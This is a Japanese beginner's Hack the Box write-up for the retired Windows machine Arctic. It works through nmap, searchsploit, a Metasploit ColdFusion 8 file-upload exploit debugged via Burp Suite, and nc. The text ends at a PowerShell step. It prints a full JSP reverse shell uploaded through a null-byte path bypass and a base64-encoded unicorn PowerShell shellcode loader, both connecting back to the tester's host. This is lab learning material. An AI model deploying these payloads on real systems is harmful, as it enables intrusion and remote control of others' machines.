【Hack the Box write-up】Arctic

February 20, 2020

僕にとって初めて挑戦する Hack the Box の machine です。

説明ガバガバな部分もあると思いますがアドバイスや訂正があったらぜひぜひコメントにお願いします。

今回挑戦する Arctic はすでに retired されている machine なので公式のwrite-throughが Youtube で公開されています。 こちらを参考にして進めていきます。

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machineについて

難易度は easy です。 スクリーンショット 2020-02-22 18.18.51.png

nmapでポートスキャン

[email protected]:~$ nmap -Pn -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 00:36 EST
Nmap scan report for 10.10.10.11
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.32 seconds

使用したnmapの各オプションについて

Nampスキャンの全コマンド・オプションを日本語解説|ネットワークのセキュリティーはNmapで抑えよう

-Pn : ICMPのみでなく80,443番ポートにもTCPパケットを送り、同セグメントではARPも送信しホストの存在を判断
-A : OSの種類とそのバージョンを検知

ICMPとは

通常 nmap はスキャンの前に ping での疎通確認を行っているそうです。ICMP とは ping コマンドを使用した際に用いられているプロトコルだそうで。 ICMPとPINGコマンド

ARPとは

ARP とは IP アドレスから MAC アドレスを知るために用いるプロトコルだそうです。

一旦公式のwrite-throughを見る

公式の write-through では以下のオプションで nmap を使用していました。

$ nmap -sV -sC -oA nmap 10.10.10.11

オプションについて

-sV バージョン検出のみ行う(-AはOSの種類とバージョンの検出)
-sC デフォルトのNSEスクリプトを実行する
-oA 出力結果を(全フォーマットに)出力する

以下の公式のリファレンスが参考になります サービスとバージョンの検出 出力 Chapter 9. Nmap Scripting Engine

NSE に関しては以下のページも参考になります。 Nmap Scripting Engine

発見した8500番ポートにブラウザでアクセスする

僕は結果をみてもよくわからないので全てのポートにアクセスしてみました。8500 番ポートのみディレクトリを表示します。

色々いじってみて /CFIDE/administrator にアクセスすると Coldfusion8 administrator と書かれたページが現れます。

Coldfusionのexploitを探す

searchsploitコマンドで Coldfusion8 の exploit を探します。

kal[email protected]:~$ searchsploit coldfusion
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                                                   | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                                                | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                                                   | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                                         | exploits/multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                                                                     | exploits/cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                                                                    | exploits/cfm/webapps/36172.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                                             | exploits/windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)                                                                | exploits/multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                                       | exploits/multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)                                                             | exploits/multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                                          | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting                       | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                                | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                                 | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                                           | exploits/windows/remote/43993.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                                                   | exploits/multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                                         | exploits/windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure                                                                | exploits/multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                                     | exploits/cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                                               | exploits/multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                                                 | exploits/cfm/remote/21548.txt
ColdFusion MX - Remote Development Service                                                                                            | exploits/windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure                                                                             | exploits/asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service                                                        | exploits/multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure                                                                     | exploits/cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service                                                              | exploits/multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                                             | exploits/multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting                                                                 | exploits/cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation                                                                 | exploits/multiple/remote/24654.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

version 8 を抜き出すと

Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                                          | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting                       | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                                | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                                 | exploits/cfm/webapps/33168.txt

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                                     | exploits/cfm/webapps/16788.rb

File Uploadのやつを使います

Metasploitで頑張る

msf5 > search coldfusion

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank       Check  Description
   -  ----                                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/coldfusion_pwd_props                          2013-05-07       normal     Yes    ColdFusion 'password.properties' Hash Extraction
   1  auxiliary/scanner/http/adobe_xml_inject                                         normal     No     Adobe XML External Entity Injection
   2  auxiliary/scanner/http/coldfusion_locale_traversal                              normal     No     ColdFusion Server Check
   3  auxiliary/scanner/http/coldfusion_version                                       normal     No     ColdFusion Version Scanner
   4  exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce  2016-03-28       excellent  Yes    HID discoveryd command_blink_on Unauthenticated RCE
   5  exploit/multi/http/coldfusion_ckeditor_file_upload             2018-09-11       excellent  No     Adobe ColdFusion CKEditor unrestricted file upload
   6  exploit/multi/http/coldfusion_rds_auth_bypass                  2013-08-08       great      Yes    Adobe ColdFusion RDS Authentication Bypass
   7  exploit/windows/http/coldfusion_fckeditor                      2009-07-03       excellent  No     ColdFusion 8.0.1 Arbitrary File Upload and Execute


msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > show options

Module options (exploit/windows/http/coldfusion_fckeditor):

   Name           Current Setting                                                             Required  Description
   ----           ---------------                                                             --------  -----------
   FCKEDITOR_DIR  /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm  no        The path to upload.cfm 
   Proxies                                                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80                                                                          yes       The target port (TCP)
   SSL            false                                                                       no        Negotiate SSL/TLS for outgoing connections
   VHOST                                                                                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal Windows Target


msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11
RHOSTS => 10.10.10.11
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
RPORT => 8500
msf5 exploit(windows/http/coldfusion_fckeditor) > run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.

先ほどの exploit を使用して普通にやってみても失敗します。

advance optionをいじる

msf5 exploit(windows/http/coldfusion_fckeditor) > show advanced option

Module advanced options (exploit/windows/http/coldfusion_fckeditor):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for windows authentification
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPartialResponses    false                                               no        Return partial HTTP responses despite timeouts
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                0                                                   no        Additional delay when waiting for a session


Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/http/coldfusion_fckeditor) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/http/coldfusion_fckeditor) > run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.

VERBOSE を true に変更してみましたが、出力は変わりませんでした。

Burp Suite

Burp Suite でリクエストの内容をみて原因を探ります。

以下のように設定します。

スクリーンショット 2020-02-16 21.17.52.png スクリーンショット 2020-02-16 21.17.58.png

これにより localhost:8500 に来たリクエストは Burp Suite によって 10.10.10.11:8500 に redirect されます。

再度チャレンジ

intercept が on なことを確認してから、 スクリーンショット 2020-02-16 21.35.23.png

exploit の向きを localhost:8500 に変更し、run します。

msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/http/coldfusion_fckeditor) > run

同様に失敗しますが、Burp Suite でそのリクエストをキャッチします。 Repeater を使用してキャッチしたリクエスト(run によって送信されたリクエスト)を再度 Burp Suite を使って送信します。

スクリーンショット 2020-02-16 21.38.44.png

すると成功します。

※ここ未だに謎ポイントです。 何故 Metasploit では失敗したのに Burp Suite を使うと成功するのでしょうか? 僕なりには Metasploit では一定の時間 response が無いと失敗と見なされる。今回は一度のリクエストでレスポンスが帰ってくるまでに暫くの時間がかかるので失敗となった。 ということなのかなと思いましたが、どうなんでしょうか。 (分かる方いらっしゃいましたらコメントお願いします🙇‍♂️)

リクエストで何が送られているかを見る

run で何がリクエストされているのかをみてみます。

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/Y.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_387_507016430_1561099465
Content-Length: 1585
Connection: close

--_Part_387_507016430_1561099465
Content-Disposition: form-data; name="newfile"; filename="QNAXOXFN.txt"
Content-Type: application/x-java-archive

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream sq;
    OutputStream ab;

    StreamConnector( InputStream sq, OutputStream ab )
    {
      this.sq = sq;
      this.ab = ab;
    }

    public void run()
    {
      BufferedReader ek  = null;
      BufferedWriter hnb = null;
      try
      {
        ek  = new BufferedReader( new InputStreamReader( this.sq ) );
        hnb = new BufferedWriter( new OutputStreamWriter( this.ab ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = ek.read( buffer, 0, buffer.length ) ) > 0 )
        {
          hnb.write( buffer, 0, length );
          hnb.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( ek != null )
          ek.close();
        if( hnb != null )
          hnb.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath = "cmd.exe";
    Socket socket = new Socket( "10.10.14.2", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

--_Part_387_507016430_1561099465--

CurrentFolder=/Y.jsp%00となっていて最後に null byte が入っていることで CurrentFolder のチェックをかいくぐっているという認識で大丈夫ですかね? (ここも理解が怪しい)

ファイルの中身により 10.10.14.2:4444 で待ち受けてリバースシェルを取得できそうです

uploadしたファイルを実行

まず、nc コマンドを使ってリバースシェルを待ち受けます。

[email protected]:~$ nc -lvnp 4444
listening on [any] 4444 ...

先ほどの interrupt を off にしてから スクリーンショット 2020-02-16 22.57.50.png ブラウザで先ほど upload したファイルにアクセスすることで実行します。

すると

[email protected]:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49224
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>

このようにリバースシェルを取得できます。

ncコマンドのオプションについて

Netcatの便利な機能について

-n:DNSによる名前解決を行わない
-l:リッスンモード
-v:標準メッセージの出力
-p:ポートの指定

Meterpreterを利用したい

unicornを使用します。 (Kali Linux にはデフォでは入っていないようなので僕は github から落としました)

unicorn は PowerShell のダウングレード攻撃を利用して何かをよしなにやってくれるツールだそうです。(これもあんまりわかっていない)

unicorn の利用方法は

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

です。

以下のコマンドを実行します。

[email protected]:~$ unicorn/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 31337

これによって 2 つのファイルが生成されます。

生成ファイルその1:unicorn.rc

[email protected]:~$ cat unicorn.rc 
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 31337
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j

matesploit 内でやるべきことを色々書いてくれています。

生成ファイルその2:powershell_attack.txt

[email protected]:~$ cat powershell_attack.txt 
powershell /w 1 /C "s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('JABvAGcAPQAnACQAbgBtAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAeQBuAEEAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlACIAKwAiAGwAIgArACIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABhAEMAcgAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQAiACsAIgBsACIAKwAiADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABoAHoAWAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgBhAEMAcgAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAByACIAKwAiAGUAIgArACIAYQBkACIAKQA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgB5AG4AQQAiACwAIAAiAGMAYQBsAGwAbwBjACIAKQA7ACQAdABSAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AMABhACwAfQAwAGEALAB9ADAAYwAsAH0AYwAyACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA3AGEALAB9ADYAOQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADU'+'AOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQATgBqAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABuAG0AIAAtAE4AYQBtAGUAIAAiAHkAUQAiACAALQBuAGEAbQBlAHMAIABKAGUAYgA7ACQATgBqAD0AJABOAGoALgByAGUAcABsAGEAYwBlACgAIgBKAGUAYgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQAiACsAIgBvACIAKwAiAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJAB0AFIAIAA9ACAAJAB0AFIALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGUAQgBzAEwAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBlAEIAcwBMACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEEAPQAwAHgAMQAwADAAMgA7AGkAZgAgACgAJAB0AFIALgBMACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABUAEEAPQAkAHQAUgAuAEwAfQA7ACQAZwBCAD0AJABOAGoAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADIALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGgAegBYACAAPQAgADAAOwBmAG8AcgAoACQAcABpAD0AMAA7ACQAcABpACAALQBsAGUAKAAkAHQAUgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABwAGkAKwArACkAewAkAE4AagA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcAQgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABwAGkAKQAsACAAJAB0AFIAWwAkAHAAaQBdACwAIAAxACkAfQA7ACQATgBqADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGcAQgAsACAAMAB4ADEAMAAwADIALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGgAegBYACkAOwAkAE4AagA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZwBCACwAMAAsADAALAAwACkAOwAnADsAJABoAHUAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG8AZwApACkAOwAkAFYASQA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAHYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAcgBhAGMAIAA9ACAAIgBDADoAXAAkAEIAdgBcAHMAeQBzAHcAbwB3ADYANABcACQAQgB2ACQAVgBJAFwAdgAxAC4AMABcACQAVgBJACIAOwAkAEMAYQBVACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEMAYQBVACcAKQB7ACQAVgBJAD0AIAAkAHIAYQBjAH0AOwAkAFUAVgA9ACIAIAAkAFYASQAgAHEAUgBoACAAJABoAHUAIgA7ACQAVQBWAD0AJABVAFYALgByAGUAcABsAGEAYwBlACgAIgBxAFIAaAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFUAVgA=')"

実際の攻撃コードです。

先ほどのリバースシェルからpowershell_attack.txtを実行

まず、powershell_attack.txt を編集して exploit.html として保存します。

